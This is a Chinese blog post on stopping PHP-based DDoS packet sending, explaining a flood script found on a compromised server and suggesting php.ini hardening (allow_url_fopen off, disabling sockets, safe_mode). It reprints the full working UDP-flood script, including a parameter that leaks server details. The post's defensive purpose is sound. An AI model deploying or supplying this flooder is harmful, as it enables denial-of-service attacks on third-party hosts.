php的ddos攻擊解決方法

更新時(shí)間：2015年01月08日 09:22:20 投稿：shichen2014

這篇文章主要介紹了php的ddos攻擊解決方法,實(shí)例分析了ddos攻擊程序的原理與針對(duì)性的解決方法,是非常實(shí)用的技巧,需要的朋友可以參考下

本文實(shí)例講述了php的ddos攻擊解決方法。分享給大家供大家參考。具體分析如下：

今天自己的一臺(tái)機(jī)器突然向外部發(fā)送大量數(shù)據(jù)包,可每秒到1G以上,雖然我用策略把UDP禁止包是發(fā)不出去但是很占cup啊,所以想到最后還是想辦法解決了.

先看源碼,代碼如下:

<?php 

set_time_limit(999999); 

$host = $_GET['host']; 

$port = $_GET['port']; 

$exec_time = $_GET['time']; 

$Sendlen = 65535; 

$packets = 0; 

ignore_user_abort(True); 

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){ 

        if (StrLen($_GET['rat'])<>0){ 

                echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat']; 

                exit; 

            } 

        echo "Parameters can not be empty!"; 

        exit; 

    } 

for($i=0;$i<$Sendlen;$i++){ 

        $out .= "A"; 

    } 

$max_time = time()+$exec_time; 

while(1){ 

    $packets++; 

    if(time() > $max_time){ 

        break; 

    } 

    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5); 

        if($fp){ 

            fwrite($fp, $out); 

            fclose($fp); 

    } 

} 

echo "Send Host：$host:$port<br><br>"; 

echo "Send Flow：$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>"; 

echo "Send Rate：" . round($packets/$exec_time, 2) . " packs/s；" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s"; 

?>

關(guān)鍵代碼在于如下:

復(fù)制代碼代碼如下:

$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);

方法很簡(jiǎn)單,向目標(biāo)主機(jī)發(fā)送UDP包,在加上定義無(wú)限死循環(huán),就會(huì)形成較大的壓力.

這個(gè)壓力是對(duì)于執(zhí)行這個(gè)腳本的服務(wù)器來(lái)說(shuō)的,因?yàn)樗紫葘?duì)自身的網(wǎng)寬、CPU等資源造成大量占用,如果想用這個(gè)腳本對(duì)目標(biāo)站點(diǎn)形成壓力,需要在多個(gè)服務(wù)器上執(zhí)行該腳本,DDOS嘛,既然是用fsockopen請(qǐng)求外部,那就不讓他請(qǐng)求.

php.ini里設(shè)置,代碼如下:

復(fù)制代碼代碼如下:

allow_url_fopen = Off

如果這樣他還是能發(fā)包,代碼如下:

extension=php_sockets.dll

改成

;extension=php_sockets.dll

重啟APACHE、IIS、NGINX,這樣就可以防止PHP DDOS發(fā)包了.

另外有網(wǎng)友說(shuō),讓腳本不允許設(shè)置為不超時(shí)很簡(jiǎn)單：

1. 把set_time_limit函數(shù)禁用

2. 啟用PHP的安全模式(safe_mode=on).

禁用socket函數(shù)可以把把socket模塊直接全部禁用也可以禁用fsockopen函數(shù),建議,由于socket常用于發(fā)送郵件找回密碼,因此建議開(kāi)啟直接開(kāi)啟安全模式,但是這樣的話,腳本每30秒超時(shí)一次,估計(jì)沒(méi)有哪個(gè)“黑客”寂寞到每30秒去點(diǎn)一下開(kāi)始DDOS.

經(jīng)驗(yàn):這種問(wèn)題一般是網(wǎng)站安全引起的,我們要注意網(wǎng)站的安全及服務(wù)器的安全,這樣就不容易被入侵了,如果會(huì)用macofee的朋友,對(duì)網(wǎng)站進(jìn)行限制一下就會(huì)更好一些.

希望本文所述對(duì)大家的php程序設(shè)計(jì)有所幫助。

您可能感興趣的文章: